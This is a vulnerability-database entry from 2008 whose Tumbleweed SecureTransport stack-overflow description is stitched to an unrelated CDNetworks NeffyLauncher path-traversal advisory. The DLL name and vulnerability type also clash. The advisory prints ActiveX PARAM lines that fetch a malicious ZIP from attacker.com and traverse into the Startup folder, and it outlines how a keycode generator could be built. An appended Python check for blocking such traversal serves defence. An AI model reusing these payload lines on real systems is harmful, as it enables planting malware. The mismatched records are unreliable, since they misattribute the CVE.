Tumbleweed SecureTransport vcst_eu.dll ActiveX Control Remote Stack Overflow Vulnerability

Vulnerability ID: 1114947    Vulnerability type: Path traversal
Published: 2008-04-07    Updated: 2008-11-05
CVE: CVE-2008-1885    CNNVD ID: CNNVD-200804-300
Platform: Windows    CVSS score: 6.8
|Sources
https://www.exploit-db.com/exploits/5397
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200804-300
|Vulnerability details
Tumbleweed SecureTransport is a secure file transfer solution that lets users transfer sensitive files over the Internet. A buffer overflow vulnerability exists in SecureTransport's FileTransfer ActiveX control (vcst_en.dll, CLSID: 38681fbd-d4cc-4a59-a527-b3136db711d3); a remote attacker could exploit it to take control of the user's system. Relevant code:

    interface IActiveXTransfer : IDispatch {
        [id(0x00000007), helpstring("method TransferFile")]
        HRESULT TransferFile(
            [in] VARIANT URL,
            [in] VARIANT hostName,
            [in] VARIANT localFile,
            [in] VARIANT remoteFile,
            [in] VARIANT fdxCookie,
            [in] long isSecure,
            [in] long isUpload,
            [in] int portNo,
            [in] long isAscii,
            [in] long shouldPerformMD5,
            [in] long isCheckpointRestart,
            [in] int serverPing,
            [out, retval] VARIANT* errBuffer);
    };

Passing a very long value in the remoteFile parameter of IActiveXTransfer.FileTransfer() triggers a stack overflow, leading to arbitrary code execution. Other parameters, such as localFile and fdxCookie, may be affected by similar flaws.
|Exploit
Title: CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities
Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)
Severity: High
Impact: Remote Code Execution
Vulnerable Systems: MS Windows Systems
Version: NeffyLauncher 1.0.5 {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C}
Solution: Upgrade the vendor's patch
Vendor's Homepage: http://www.cdnetworks.com
Reference: How to stop an ActiveX control from running in Internet Explorer
          http://support.microsoft.com/kb/240797/ko
          http://support.microsoft.com/kb/240797/en-us
History:
  - 02.27.2008: Initiate notify
  - 03.06.2008: The vendor patched
  - After: The vendor is applying the patch to their customers.

Description:
Nefficient Download is an ActiveX control used to download and to upgrade
files such as game install files through HTTP, FTP, etc. It has two
vulnerabilities.
1st, an attacker can copy a malicious file to any path, such as the startup
program folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup).
2nd, an attacker can issue keycodes, which are used to restrict execution on
other domains.

Object:
I am disclosing this vulnerability not to promote abnormal uses but to make
the software more secure. This vulnerability was patched through the vendor's
positive effort. I hope this information helps many people who are trying
to study security and to develop applications.

1. Remote Code Execution
First of all, we must have write permission on a board in a web site that
uses this ActiveX control, or obtain a valid keycode that is correct for our site.
An attacker who has a valid keycode can make an exploit by modifying the
HttpSkin and SkinPath values. Malicious files, which are on the attacker's
site, must be compressed as a ZIP file.
For instance, the modification below copies abnormal files to the Windows
root directory.
<PARAM NAME="HttpSkin" VALUE="http://www.attacker.com/maliciousFiles.zip">
<PARAM NAME="SkinPath" VALUE="../../../../">

In this way an attacker can modify SkinPath's value to the All Users Start
Programs folder. Then he can execute his malicious program when the user
restarts the computer.

2. Generating a KeyCode Value
An attacker can make a keycode generator by debugging this ActiveX
control. A keycode's value has two parts. The first two digits represent
the domain's length (hexadecimal).
The next five (or more) digits are the numbers used to calculate a domain.
The keycode check procedure of this ActiveX control is as below.
It calculates the keycode's value and returns four bytes as a result.
Next it starts the domain's calculation and returns four bytes.
Finally, it compares these four bytes to check whether the site is
valid.
I made a PoC using inline assembly and C, but it is not open to the public
because of the vendor's request. (Just refer to the descriptions above.)

# milw0rm.com [2008-04-07]
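Section 1 of the advisory above describes the traversal: the SkinPath parameter and the entry names inside the ZIP fetched via HttpSkin both feed the extraction path without a containment check. The Python below is an added example, not code from the advisory or from CDNetworks; it shows the check an extractor needs and runs it over a constructed sample archive. The base directory /tmp/neffy_skins, the function names and the sample entries are assumptions.

```python
import io
import os
import posixpath
import zipfile

def safe_extract_path(base_dir, skin_path, entry_name):
    """Return the absolute destination for one ZIP entry, or None when the
    combination of SkinPath and entry name would land outside base_dir.
    Both inputs are attacker-influenced: SkinPath comes from the <PARAM>
    tag, entry names from the ZIP fetched via HttpSkin."""
    rel = os.path.join(skin_path, entry_name).replace("\\", "/")
    # Reject absolute names and anything with a colon (drive letters such
    # as "C:/", NTFS streams); neither belongs in a skin path.
    if posixpath.isabs(rel) or ":" in rel:
        return None
    base = os.path.realpath(base_dir)  # assumed skin directory
    dest = os.path.realpath(os.path.join(base, *rel.split("/")))
    # After normalisation the destination must still sit under base_dir;
    # a SkinPath of "../../../../" fails here instead of reaching the root.
    if os.path.commonpath([base, dest]) != base:
        return None
    return dest

def vet_skin_archive(base_dir, skin_path, zip_bytes):
    """Classify every entry of an in-memory skin ZIP as accepted or rejected."""
    accepted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            dest = safe_extract_path(base_dir, skin_path, name)
            (accepted if dest else rejected).append(name)
    return accepted, rejected

def build_sample_skin_zip():
    """Constructed sample archive: one legitimate skin file plus two
    traversal entries of the kind a hostile skin ZIP could carry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("theme/background.bmp", b"BM...")
        zf.writestr("..\\..\\..\\..\\Programs\\Startup\\run.exe", b"MZ...")
        zf.writestr("/Windows/evil.dll", b"MZ...")
    return buf.getvalue()

if __name__ == "__main__":
    acc, rej = vet_skin_archive("/tmp/neffy_skins", "skins", build_sample_skin_zip())
    print("accepted:", acc, "rejected:", rej)
    # A hostile SkinPath rejects even the legitimate entry.
    print(safe_extract_path("/tmp/neffy_skins", "../../../../", "theme/background.bmp"))
```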
|References

Source: XF
Name: nefficientdload-neffylauncher-dir-traversal (41743)
Link: http://xforce.iss.net/xforce/xfdb/41743
Source: BID
Name: 28666
Link: http://www.securityfocus.com/bid/28666
Source: MILW0RM
Name: 5397
Link: http://www.milw0rm.com/exploits/5397
Source: VUPEN
Name: ADV-2008-1186
Link: http://www.frsirt.com/english/advisories/2008/1186
Source: SECUNIA
Name: 29692
Link: http://secunia.com/advisories/29692
Source: BUGTRAQ
Name: 20080407 CDNetworks Nefficient Download (NeffyLauncher.dll) Vulnerabilities
Link: http://seclists.org/bugtraq/2008/Apr/0065.html